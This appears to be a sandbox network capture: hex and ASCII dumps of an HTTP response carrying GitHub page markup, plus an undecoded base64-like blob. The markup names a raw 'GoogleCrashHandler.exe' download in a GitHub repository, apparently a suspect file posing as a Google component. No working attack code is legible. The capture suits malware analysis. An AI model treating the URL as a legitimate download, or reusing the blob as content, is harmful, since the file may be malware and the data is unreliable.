                                                                                              2022-08-10 04:48:02 UTC366INData Raw: 20 30 20 30 30 30 20 31 2e 37 35 76 31 32 2e 35 43 30 20 31 35 2e 32 31 36 2e 37 38 34 20 31 36 20 31 2e 37 35 20 31 36 68 31 32 2e 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 31 36 20 31 34 2e 32 35 56 31 2e 37 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 31 34 2e 32 35 20 30 48 31 2e 37 35 7a 4d 31 2e 35 20 31 2e 37 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 32 35 2d 2e 32 35 68 31 32 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 32 35 2e 32 35 76 31 32 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2d 2e 32 35 2e 32 35 48 31 2e 37 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2d 2e 32 35 2d 2e 32 35 56 31 2e 37 35 7a 4d 31 31 2e 37 35 20 33 61 2e 37 35 2e 37 35 20 30 20 30 30 2d 2e 37 35 2e 37 35 76 37 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 30 31 2e 35 20 30
                                                                                              Data Ascii: 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0
                                                                                              2022-08-10 04:48:02 UTC367INData Raw: 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 73 65 61 72 63 68 2d 74 65 78 74 2d 67 6c 6f 62 61 6c 20 64 2d 6e 6f 6e 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 69 6e 20 61 6c 6c 20 6f 66 20 47 69 74 48 75 62 22 3e 0a 20 20 20 20 20 20 20 20 41 6c 6c 20 47 69 74 48 75 62 0a 20 20 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 64 2d 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 6d 6c 2d 31 20 76 2d 61 6c 69 67 6e 2d 6d 69 64 64 6c 65 22 3e e2 86 b5 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 64 69 76 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 63 6c
                                                                                              Data Ascii: <span class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub"> All GitHub </span> <span aria-hidden="true" class="d-inline-block ml-1 v-align-middle"></span> </div> <div aria-hidden="true" cl
                                                                                              2022-08-10 04:48:02 UTC368INData Raw: 73 69 74 6f 72 79 22 20 72 6f 6c 65 3d 22 69 6d 67 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 72 65 70 6f 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 2d 72 65 70 6f 20 64 2d 6e 6f 6e 65 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 20 32 2e 35 41 32 2e 35 20 32 2e 35 20 30 20 30 31 34 2e 35 20 30 68 38 2e 37 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2e 37 35
                                                                                              Data Ascii: sitory" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75
                                                                                              2022-08-10 04:48:02 UTC370INData Raw: 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 73 65 61 72 63 68 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 2d 73 65 61 72 63 68 20 64 2d 6e 6f 6e 65 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 31 2e 35 20 37 61 34 2e 34 39 39 20 34 2e 34 39 39 20 30 20 31 31 2d 38 2e 39 39 38 20 30 41 34 2e 34 39 39 20 34 2e 34 39 39 20 30 20 30 31 31 31 2e 35 20 37 7a 6d 2d 2e 38 32 20 34 2e 37 34 61 36 20 36 20 30 20 31 31 31 2e 30 36 2d 31 2e 30 36 6c 33 2e 30 34 20 33 2e 30 34
                                                                                              Data Ascii: sion="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04
                                                                                              2022-08-10 04:48:02 UTC371INData Raw: 6c 65 78 2d 6a 75 73 74 69 66 79 2d 73 74 61 72 74 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 70 2d 30 20 66 35 20 6e 61 76 69 67 61 74 69 6f 6e 2d 69 74 65 6d 20 6a 73 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 69 74 65 6d 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 77 6e 65 72 2d 73 63 6f 70 65 64 2d 73 65 61 72 63 68 20 64 2d 6e 6f 6e 65 22 20 72 6f 6c 65 3d 22 6f 70 74 69 6f 6e 22 3e 0a 20 20 3c 61 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 61 75 74 6f 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 73 2d 70 61 74 68 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 2d 70 61
                                                                                              Data Ascii: lex-justify-start flex-items-center p-0 f5 navigation-item js-navigation-item js-jump-to-owner-scoped-search d-none" role="option"> <a tabindex="-1" class="no-underline d-flex flex-auto flex-items-center jump-to-suggestions-path js-jump-to-suggestion-pa
                                                                                              2022-08-10 04:48:02 UTC372INData Raw: 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 31 36 20 31 34 2e 32 35 56 31 2e 37 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 31 34 2e 32 35 20 30 48 31 2e 37 35 7a 4d 31 2e 35 20 31 2e 37 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 32 35 2d 2e 32 35 68 31 32 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 32 35 2e 32 35 76 31 32 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2d 2e 32 35 2e 32 35 48 31 2e 37 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2d 2e 32 35 2d 2e 32 35 56 31 2e 37 35 7a 4d 31 31 2e 37 35 20 33 61 2e 37 35 2e 37 35 20 30 20 30 30 2d 2e 37 35 2e 37 35 76 37 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 30 31 2e 35 20 30 76 2d 37 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 30 2d 2e 37 35 2d 2e 37 35 7a 6d 2d 38 2e 32 35 2e 37 35 61 2e 37 35 2e 37 35 20 30
                                                                                              Data Ascii: 5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0
                                                                                              2022-08-10 04:48:02 UTC374INData Raw: 78 74 2d 67 6c 6f 62 61 6c 20 64 2d 6e 6f 6e 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 69 6e 20 61 6c 6c 20 6f 66 20 47 69 74 48 75 62 22 3e 0a 20 20 20 20 20 20 20 20 41 6c 6c 20 47 69 74 48 75 62 0a 20 20 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 64 2d 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 6d 6c 2d 31 20 76 2d 61 6c 69 67 6e 2d 6d 69 64 64 6c 65 22 3e e2 86 b5 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 64 69 76 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 62 6f 72 64 65 72 20 72 6f 75 6e 64 65 64 2d 32 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 63 6f 6c 6f 72 2d 62 67 2d 73
                                                                                              Data Ascii: xt-global d-none" aria-label="in all of GitHub"> All GitHub </span> <span aria-hidden="true" class="d-inline-block ml-1 v-align-middle"></span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-s
                                                                                              2022-08-10 04:48:02 UTC375INData Raw: 2e 32 35 20 30 20 30 30 2e 34 2e 32 6c 31 2e 34 35 2d 31 2e 30 38 37 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 33 20 30 4c 38 2e 36 20 31 35 2e 37 61 2e 32 35 2e 32 35 20 30 20 30 30 2e 34 2d 2e 32 76 2d 33 2e 32 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2d 2e 32 35 2d 2e 32 35 68 2d 33 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2d 2e 32 35 2e 32 35 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 20 20 3c 73 76 67 20 74 69 74 6c 65 3d 22 50 72 6f 6a 65 63 74 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 50 72 6f 6a 65 63 74 22 20 72 6f 6c 65 3d 22 69 6d 67 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76
                                                                                              Data Ascii: .25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-v
                                                                                              2022-08-10 04:48:02 UTC376INData Raw: 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 2d 6e 61 6d 65 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 2d 6e 61 6d 65 20 66 6c 65 78 2d 61 75 74 6f 20 6f 76 65 72 66 6c 6f 77 2d 68 69 64 64 65 6e 20 74 65 78 74 2d 6c 65 66 74 20 6e 6f 2d 77 72 61 70 20 63 73 73 2d 74 72 75 6e 63 61 74 65 20 63 73 73 2d 74 72 75 6e 63 61 74 65 2d 74 61 72 67 65 74 22 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 72 64 65 72 20 72 6f 75 6e 64 65 64 2d 32 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 63 6f 6c 6f 72 2d 62 67 2d 73 75 62 74 6c 65 20 70 78 2d 31 20 63 6f 6c 6f 72 2d 66 67 2d 6d 75 74 65 64 20 6d 6c 2d 31 20 66 36 20 64 2d 6e 6f 6e 65
                                                                                              Data Ascii: <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none
                                                                                              2022-08-10 04:48:02 UTC378INData Raw: 6f 74 3b 3a 26 71 75 6f 74 3b 73 69 74 65 20 68 65 61 64 65 72 20 6d 65 6e 75 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 72 65 70 6f 73 69 74 6f 72 79 5f 69 64 26 71 75 6f 74 3b 3a 6e 75 6c 6c 2c 26 71 75 6f 74 3b 61 75 74 68 5f 74 79 70 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 53 49 47 4e 5f 55 50 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6f 72 69 67 69 6e 61 74 69 6e 67 5f 75 72 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 47 6f 6f 67 6c 65 43 72 61 73 68 48 61 6e 64 6c 65 72 2e 65 78 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 75 73 65 72 5f 69 64 26 71 75 6f 74 3b 3a 6e 75 6c 6c 7d 7d 22 20 64 61 74 61 2d 68 79 64 72 6f
                                                                                              Data Ascii: ot;:&quot;site header menu&quot;,&quot;repository_id&quot;:null,&quot;auth_type&quot;:&quot;SIGN_UP&quot;,&quot;originating_url&quot;:&quot;https://github.com/gowgerrie/reborn/raw/main/04/GoogleCrashHandler.exe&quot;,&quot;user_id&quot;:null}}" data-hydro
                                                                                              2022-08-10 04:48:02 UTC379INData Raw: 6c 6f 63 6b 20 6a 73 2d 6c 6f 67 69 6e 2d 66 69 65 6c 64 22 20 61 75 74 6f 63 61 70 69 74 61 6c 69 7a 65 3d 22 6f 66 66 22 20 61 75 74 6f 63 6f 72 72 65 63 74 3d 22 6f 66 66 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 75 73 65 72 6e 61 6d 65 22 20 61 75 74 6f 66 6f 63 75 73 3d 22 61 75 74 6f 66 6f 63 75 73 22 20 2f 3e 0a 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 22 3e 0a 20 20 20 20 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 70 61 73 73 77 6f 72 64 22 3e 0a 20 20 20 20 20 20 50 61 73 73 77 6f 72 64 0a 20 20 20 20 3c 2f 6c 61 62 65 6c 3e 0a 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 20 6e 61 6d 65 3d 22 70 61 73 73 77 6f 72 64 22 20 69 64 3d 22 70 61 73 73 77 6f 72 64 22
                                                                                              Data Ascii: lock js-login-field" autocapitalize="off" autocorrect="off" autocomplete="username" autofocus="autofocus" /> <div class="position-relative"> <label for="password"> Password </label> <input type="password" name="password" id="password"
                                                                                              2022-08-10 04:48:02 UTC380INData Raw: 61 6c 75 65 3d 22 63 62 30 61 61 65 37 66 64 36 32 34 33 31 33 63 37 34 37 61 38 31 33 38 31 65 62 32 32 63 37 64 66 39 39 35 34 31 61 35 32 30 34 30 63 36 63 35 37 35 32 37 62 31 39 32 65 62 64 36 62 31 64 63 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 2f 3e 0a 0a 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 6e 61 6d 65 3d 22 63 6f 6d 6d 69 74 22 20 76 61 6c 75 65 3d 22 53 69 67 6e 20 69 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 20 62 74 6e 2d 62 6c 6f 63 6b 20 6a 73 2d 73 69 67 6e 2d 69 6e 2d 62 75 74 74 6f 6e 22 20 64 61 74 61 2d 64 69 73 61 62 6c 65 2d 77 69 74 68 3d 22 53 69 67 6e 69 6e 67 20 69 6e e2 80 a6
                                                                                              Data Ascii: alue="cb0aae7fd624313c747a81381eb22c7df99541a52040c6c57527b192ebd6b1dc" autocomplete="off" class="form-control" /> <input type="submit" name="commit" value="Sign in" class="btn btn-primary btn-block js-sign-in-button" data-disable-with="Signing in
                                                                                              2022-08-10 04:48:02 UTC382INData Raw: 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 73 69 67 6e 20 75 70 20 66 6f 72 20 61 63 63 6f 75 6e 74 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 47 6f 6f 67 6c 65 43 72 61 73 68 48 61 6e 64 6c 65 72 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 53 69 67 6e 20 75 70 3b 72 65 66 5f 6c 6f 63 3a 68 65 61 64 65 72 20 6c 6f 67 67 65 64 20 6f 75 74 26 71 75 6f 74 3b 7d 22 0a 20 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 53 69 67 6e 20 75 70 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76
                                                                                              Data Ascii: on&quot;:&quot;click to sign up for account&quot;,&quot;label&quot;:&quot;ref_page:/gowgerrie/reborn/raw/main/04/GoogleCrashHandler.exe;ref_cta:Sign up;ref_loc:header logged out&quot;}" > Sign up </a> </div> </div
                                                                                              2022-08-10 04:48:02 UTC383INData Raw: 73 73 69 6f 6e 2d 68 6f 76 65 72 63 61 72 64 73 2d 65 6e 61 62 6c 65 64 0a 20 20 20 20 64 61 74 61 2d 69 73 73 75 65 2d 61 6e 64 2d 70 72 2d 68 6f 76 65 72 63 61 72 64 73 2d 65 6e 61 62 6c 65 64 0a 20 20 3e 0a 20 20 20 20 20 20 20 20 3c 6d 61 69 6e 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 6d 6b 74 67 22 3e 0a 0a 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 22 20 73 74 79 6c 65 3d 22 7a 2d 69 6e 64 65 78 3a 20 30 3b 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 61 6c 6c 20 30 2e 32 35 73 20 65 61 73 65 2d 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 73 69 74 69 6f 6e 2d 61 62 73 6f 6c 75 74 65 20 6f 76 65 72 66 6c 6f 77 2d 68 69 64 64 65 6e 20 77 69 64 74 68 2d 66 75 6c 6c 20 74 6f 70 2d 30
                                                                                              Data Ascii: ssion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <main class="font-mktg"> <div class="position-relative" style="z-index: 0; transition: all 0.25s ease-in"> <div class="position-absolute overflow-hidden width-full top-0
                                                                                              2022-08-10 04:48:02 UTC384INData Raw: 63 72 59 49 4e 67 6f 6f 59 42 45 59 32 4b 34 4d 35 44 42 51 62 42 46 44 45 39 55 49 32 4a 32 52 51 78 34 55 67 47 49 56 67 47 43 67 47 43 4b 42 39 4e 44 6e 44 36 61 49 33 30 79 70 6c 63 42 67 64 6c 46 70 63 46 55 44 42 52 57 50 70 71 4c 6b 76 30 30 53 68 67 70 46 70 63 4f 45 55 75 4b 5a 4d 42 6a 75 45 67 58 45 4b 5a 58 42 63 4f 45 41 4e 76 43 69 30 70 74 34 56 43 6d 31 39 56 46 70 54 59 55 4b 54 41 36 4a 6d 47 4d 67 62 44 73 36 69 38 78 54 59 5a 39 79 68 67 68 73 33 44 49 75 53 2f 54 55 4b 51 32 49 75 51 4e 67 55 43 48 30 36 71 4c 55 7a 59 55 41 78 6d 6b 4a 6c 63 46 4e 71 6b 43 59 37 51 69 34 35 53 47 79 75 6e 75 52 59 51 67 36 36 36 71 42 54 62 33 32 53 4b 51 32 74 70 34 49 41 62 64 43 6f 70 44 62 75 48 4b 47 4d 6c 78 50 43 69 6b 4e 6c 65 45 71 6c 78 44
                                                                                              Data Ascii: crYINgooYBEY2K4M5DBQbBFDE9UI2J2RQx4UgGIVgGCgGCKB9NDnD6aI30yplcBgdlFpcFUDBRWPpqLkv00ShgpFpcOEUuKZMBjuEgXEKZXBcOEANvCi0pt4VCm19VFpTYUKTA6JmGMgbDs6i8xTYZ9yhghs3DIuS/TUKQ2IuQNgUCH06qLUzYUAxmkJlcFNqkCY7Qi45SGyunuRYQg666qBTb32SKQ2tp4IAbdCopDbuHKGMlxPCikNleEqlxD
                                                                                              2022-08-10 04:48:02 UTC386INData Raw: 6f 42 78 41 71 55 46 41 50 50 52 41 34 74 34 56 46 41 4e 6f 62 56 56 4b 63 42 45 4f 4c 55 51 34 74 56 49 63 57 79 68 7a 4b 43 78 71 6a 68 58 6e 54 6d 55 46 6f 30 43 73 51 34 74 64 42 51 57 74 79 72 45 7a 6b 77 74 2f 46 55 4f 4c 55 69 5a 79 6f 4c 52 73 79 4a 54 69 33 68 44 47 54 43 79 34 36 4b 70 54 69 7a 64 41 34 74 32 56 53 6e 48 70 6c 41 34 39 4f 6a 7a 77 71 68 68 59 50 76 51 4f 4c 4f 46 55 50 68 75 45 51 77 73 47 79 46 50 69 32 69 59 35 56 7a 79 47 46 76 43 73 51 77 74 34 51 6f 34 6f 68 73 55 42 78 51 68 73 55 69 6a 67 69 47 77 34 56 68 6e 4a 73 4e 57 55 44 59 42 45 45 57 68 55 48 48 68 49 44 6a 77 6d 4d 47 52 78 4b 51 6f 34 46 41 52 59 71 51 63 45 51 66 70 6f 70 73 41 70 52 73 41 71 67 34 44 5a 41 63 4f 45 4d 44 68 77 67 4f 50 43 46 62 46 41 63 58 51
                                                                                              Data Ascii: oBxAqUFAPPRA4t4VFANobVVKcBEOLUQ4tVIcWyhzKCxqjhXnTmUFo0CsQ4tdBQWtyrEzkwt/FUOLUiZyoLRsyJTi3hDGTCy46KpTizdA4t2VSnHplA49OjzwqhhYPvQOLOFUPhuEQwsGyFPi2iY5VzyGFvCsQwt4Qo4ohsUBxQhsUijgiGw4VhnJsNWUDYBEEWhUHHhIDjwmMGRxKQo4FARYqQcEQfpopsApRsAqg4DZAcOEMDhwgOPCFbFAcXQ
                                                                                              2022-08-10 04:48:02 UTC386INData Raw: 78 47 79 54 49 47 41 51 62 42 49 59 44 41 4a 41 4d 42 73 6d 54 41 59 63 4b 52 61 33 30 2b 45 4b 48 30 79 69 35 44 36 64 79 44 59 4a 7a 6e 4d 47 41 31 55 55 4d 41 69 55 44 36 59 55 71 68 39 50 68 41 75 48 43 4b 47 4b 67 42 74 52 53 34 38 49 6b 4b 62 51 70 79 71 42 73 37 70 56 4b 62 4f 43 67 55 32 48 5a 41 75 48 48 64 46 44 41 72 4b 30 70 39 4e 41 68 73 52 53 6d 79 73 4b 42 54 36 59 32 55 71 35 77 51 2b 6e 77 6f 70 44 5a 77 67 58 48 63 4b 4b 51 32 49 45 4e 71 4b 55 32 68 52 55 7a 5a 77 55 43 47 77 37 49 45 4e 6d 72 4c 4b 34 49 62 45 71 70 6d 77 71 4c 53 6d 31 53 4c 53 47 7a 78 32 55 79 71 57 43 41 47 30 4b 46 54 4e 6f 32 30 52 61 6d 62 57 52 51 59 66 65 6f 52 35 59 41 48 44 4c 74 4b 35 55 77 43 31 47 56 42 61 33 78 51 70 77 46 57 61 6f 4c 54 73 67 70 62 59
                                                                                              Data Ascii: xGyTIGAQbBIYDAJAMBsmTAYcKRa30+EKH0yi5D6dyDYJznMGA1UUMAiUD6YUqh9PhAuHCKGKgBtRS48IkKbQpyqBs7pVKbOCgU2HZAuHHdFDArK0p9NAhsRSmysKBT6Y2Uq5wQ+nwopDZwgXHcKKQ2IENqKU2hRUzZwUCGw7IENmrLK4IbEqpmwqLSm1SLSGzx2UyqWCAG0KFTNo20RambWRQYfeoR5YAHDLtK5UwC1GVBa3xQpwFWaoLTsgpbY
                                                                                              2022-08-10 04:48:02 UTC387INData Raw: 34 4f 4c 46 55 71 6f 73 51 55 46 69 75 44 4b 67 73 54 43 5a 79 6f 4c 4f 46 55 4f 4c 4f 45 4b 63 57 44 5a 58 42 6b 34 74 34 56 6a 4a 78 59 67 63 57 67 61 49 55 34 74 47 79 49 59 57 75 68 6e 42 78 5a 77 71 68 78 59 67 59 57 38 4f 67 59 57 6e 5a 41 32 42 32 56 54 34 6e 48 70 37 70 55 48 42 43 6d 77 51 4d 4c 43 71 55 52 36 61 4a 54 44 30 77 67 59 57 44 5a 55 77 4f 49 32 55 67 5a 69 6b 42 78 4b 73 42 77 4b 49 62 42 46 48 42 51 4d 4c 65 46 59 6c 62 44 68 4d 47 63 6d 77 4f 79 66 45 2b 41 34 46 43 6a 67 68 79 6a 67 6c 42 77 51 6a 59 49 44 68 77 68 42 78 34 56 42 77 34 43 44 59 71 4b 4f 4a 51 62 42 45 77 4f 4b 4b 32 42 51 6f 34 46 43 74 67 64 6b 4b 4f 42 32 51 72 59 4b 46 48 42 43 68 39 4e 55 6f 2f 54 55 4b 33 30 79 6c 41 77 51 48 44 68 42 73 43 68 41 78 4b 68 47
                                                                                              Data Ascii: 4OLFUqosQUFiuDKgsTCZyoLOFUOLOEKcWDZXBk4t4VjJxYgcWgaIU4tGyIYWuhnBxZwqhxYgYW8OgYWnZA2B2VT4nHp7pUHBCmwQMLCqUR6aJTD0wgYWDZUwOI2UgZikBxKsBwKIbBFHBQMLeFYlbDhMGcmwOyfE+A4FCjghyjglBwQjYIDhwhBx4VBw4CDYqKOJQbBEwOKK2BQo4FCtgdkKOB2QrYKFHBCh9NUo/TUK30ylAwQHDhBsChAxKhG
                                                                                              2022-08-10 04:48:02 UTC389INData Raw: 36 49 56 6a 36 61 46 62 42 49 55 4d 41 6f 72 59 42 56 47 77 34 43 41 59 6e 5a 52 57 59 68 45 5a 6c 4d 59 58 49 4d 68 47 59 4a 42 73 65 45 57 74 67 2b 6e 69 6f 42 39 50 68 44 47 51 50 70 2b 4f 69 4b 48 30 79 6f 74 4b 62 4e 79 67 47 43 44 59 68 51 67 59 44 5a 41 44 59 4e 6b 41 77 51 4b 62 4e 6c 47 69 59 6f 41 79 41 59 68 51 4c 68 77 71 46 77 4f 79 6a 52 54 5a 77 6f 70 54 59 64 55 51 75 43 4b 55 2b 6d 73 71 6d 66 54 56 6f 55 32 37 71 4b 51 32 42 51 71 5a 73 34 55 79 75 4d 6b 4e 71 69 6b 4e 76 43 47 4d 70 47 31 46 49 62 58 53 43 5a 73 4b 69 70 47 33 68 52 55 7a 61 70 46 54 4e 68 46 46 46 53 4e 6e 48 5a 51 54 75 73 65 56 4f 5a 65 64 49 32 36 49 75 45 7a 5a 43 4c 68 50 46 53 4c 58 6a 69 33 52 64 33 6e 56 46 76 5a 57 43 67 74 32 56 78 68 4d 71 32 32 71 78 46 72
                                                                                              Data Ascii: 6IVj6aFbBIUMAorYBVGw4CAYnZRWYhEZlMYXIMhGYJBseEWtg+nioB9PhDGQPp+OiKH0yotKbNygGCDYhQgYDZADYNkAwQKbNlGiYoAyAYhQLhwqFwOyjRTZwopTYdUQuCKU+msqmfTVoU27qKQ2BQqZs4UyuMkNqikNvCGMpG1FIbXSCZsKipG3hRUzapFTNhFFFSNnHZQTuseVOZedI26IuEzZCLhPFSLXji3Rd3nVFvZWCgt2VxhMq22qxFr
